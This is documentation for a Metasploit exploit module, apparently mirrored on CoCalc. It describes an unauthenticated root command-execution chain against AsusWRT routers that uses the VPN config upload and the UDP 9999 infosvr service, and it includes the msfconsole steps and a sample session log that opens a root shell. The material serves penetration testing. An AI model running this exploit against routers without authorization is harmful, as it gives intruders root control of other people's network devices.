CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md
Views: 11788

Description

This module exploits a vulnerability in AsusWRT to execute arbitrary commands as root.

Vulnerable Application

The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode.

This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the root user.

This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.

Numerous ASUS models are reportedly affected, but untested.

Verification Steps

  1. Start msfconsole

  2. use exploits/linux/http/asuswrt_lan_rce

  3. set RHOST [IP]

  4. run

  5. You should get a root session

Options

ASUSWRTPORT

AsusWRT HTTP portal port (default: 80)

Scenarios

msf > use exploit/linux/http/asuswrt_lan_rce msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 rhost => 192.168.132.205 msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. [] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 [+] 192.168.132.205:9999 - Success, shell incoming! [] Found shell. [*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id id /bin/sh: id: not found / # cat /proc/cpuinfo cat /proc/cpuinfo system type : Broadcom BCM53572 chip rev 1 pkg 8 processor : 0 cpu model : MIPS 74K V4.9 BogoMIPS : 149.91 wait instruction : no microsecond timers : yes tlb_entries : 32 extra interrupt vector : no hardware watchpoint : yes ASEs implemented : mips16 dsp shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available

unaligned_instructions : 0 dcache hits : 2147483648 dcache misses : 0 icache hits : 2147483648 icache misses : 0 instructions : 2147483648 / #